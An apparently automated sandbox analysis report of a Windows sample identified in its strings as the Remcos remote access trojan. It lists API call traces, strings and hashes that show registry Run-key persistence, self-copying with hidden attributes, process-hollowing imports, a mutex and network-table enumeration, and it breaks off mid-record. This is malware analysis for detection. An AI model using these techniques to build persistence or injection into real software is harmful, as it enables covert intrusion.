                                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 384173800-625181639
                                                  • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                  • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                  • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                  • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                    • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                    • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                    • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yPIOW6yoPi.exe,00000104), ref: 0040D790
                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\Desktop\yPIOW6yoPi.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-I7G983$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                  • API String ID: 2830904901-1929690600
                                                  • Opcode ID: b536abd86453a7b97e05814882efc9b96c8c01a69ecb7edc18bfef705cc2de13
                                                  • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                  • Opcode Fuzzy Hash: b536abd86453a7b97e05814882efc9b96c8c01a69ecb7edc18bfef705cc2de13
                                                  • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                  Control-flow Graph

                                                  APIs
                                                  • _wcslen.LIBCMT ref: 0040BC75
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\yPIOW6yoPi.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                  • _wcslen.LIBCMT ref: 0040BD54
                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\yPIOW6yoPi.exe,00000000,00000000), ref: 0040BDF2
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                  • _wcslen.LIBCMT ref: 0040BE34
                                                  • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                  • ExitProcess.KERNEL32 ref: 0040BED0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                  • String ID: 6$C:\Users\user\Desktop\yPIOW6yoPi.exe$del$open$BG$BG
                                                  • API String ID: 1579085052-1132121390
                                                  • Opcode ID: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                  • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                  • Opcode Fuzzy Hash: 1dfc8a95e9f2fa8f15eef755b153a8034996a407d8c67b2864cbd51f99b60f53
                                                  • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE

                                                  Control-flow Graph

                                                  APIs
                                                  • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongNamePath
                                                  • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                  • API String ID: 82841172-425784914
                                                  • Opcode ID: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                  • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                  • Opcode Fuzzy Hash: 2c32c8423f05266584aa4a08fe5fa9c2e4569a415b98fb848e0406cdb68be249
                                                  • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Basic blocks 20f003c to 20f091d; API calls shown in the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA]
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 020F024D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID: cess$kernel32.dll
                                                  • API String ID: 4275171209-1230238691
                                                  • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction ID: fd96abfbcbc1ba3c88088248ade3727876ff70d63f7c93e0f6d1ce76c48a2d52
                                                  • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                  • Instruction Fuzzy Hash: 54526A74A01229DFDBA4CF58C984BACBBB1BF09304F1480D9E54DAB756DB30AA85DF14

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                    • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                  • API String ID: 782494840-2070987746
                                                  • Opcode ID: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                  • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                  • Opcode Fuzzy Hash: c28e8bf06c7bd464c54825a7174b2fee0dd0f803164bd22ac966e04bdcbe38d4
                                                  • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Basic blocks 404ab1 to 404b1a; API calls shown in the graph: CreateEventA, SetEvent, WaitForSingleObject, CloseHandle; subcalls 401f66 (twice), 41a686]
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00475B70,0040483F,00000001,?,?,00000000,00475B70,004017F3), ref: 00404AED
                                                  • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404AF9
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404B04
                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404B0D
                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: 9775dfb5b9107c1e5075dd8c94ff0be4df24a6852b4aa6a8c0f4e8621e736b03
                                                  • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                  • Opcode Fuzzy Hash: 9775dfb5b9107c1e5075dd8c94ff0be4df24a6852b4aa6a8c0f4e8621e736b03
                                                  • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Basic blocks 412774 to 4127d4; API calls shown in the graph: RegCreateKeyW, RegSetValueExW, RegCloseKey; subcalls 4022f8, 401e07, 401e13]
                                                  APIs
                                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                  • RegSetValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateValue
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                  • API String ID: 1818849710-1051519024
                                                  • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                  • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                  • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Single basic block 40bed7 to 40bf03; API calls shown in the graph: CreateMutexA, GetLastError; subcall 401e8f]
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                  • GetLastError.KERNEL32 ref: 0040BEF1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateErrorLastMutex
                                                  • String ID: Rmc-I7G983
                                                  • API String ID: 1925916568-3173645232
                                                  • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                  • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                  • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Basic blocks 412513 to 412583; API calls shown in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey; subcall 401f66]
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                  • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                  • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                  • Opcode Fuzzy Hash: f94470f8aae049659c287120717d81e51f24ff9d7638644bfb03b679d49be504
                                                  • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Basic blocks 4124b7 to 412512; API calls shown in the graph: RegOpenKeyExA, RegQueryValueExA, RegCloseKey]
                                                  APIs
                                                  • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
                                                  • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00412500
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID:
                                                  • API String ID: 3677997916-0
                                                  • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                  • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                  • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                                                   Control-flow Graph

                                                   [Control-flow graph image not preserved. Basic blocks 5307a6 to 530804; API calls shown in the graph: CreateToolhelp32Snapshot, Module32First; subcall 530465]
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005307CE
                                                  • Module32First.KERNEL32(00000000,00000224), ref: 005307EE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 3833638111-0
                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction ID: 2a049595326097830ffd434e032aa1e7b89471afc7debe5dcddc0a229b912db2
                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                  • Instruction Fuzzy Hash: 0DF06D322017156BE7203AB9A89DA6F7BE8FF89765F101528E642920C0DAB0F8458A61

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 813 43360d-433610 814 43361f-433622 call 43a88c 813->814 816 433627-43362a 814->816 817 433612-43361d call 442200 816->817 818 43362c-43362d 816->818 817->814 821 43362e-433632 817->821 822 433638-433dec call 433d58 call 437bd7 821->822 823 433ded-433e09 call 433d8b call 437bd7 821->823 822->823
                                                  APIs
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                    • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3476068407-0
                                                  • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                  • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                  • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                  • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 833 20f0e0f-20f0e24 SetErrorMode * 2 834 20f0e2b-20f0e2c 833->834 835 20f0e26 833->835 835->834
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000400,?,?,020F0223,?,?), ref: 020F0E19
                                                  • SetErrorMode.KERNEL32(00000000,?,?,020F0223,?,?), ref: 020F0E1E
                                                  Memory Dump Source
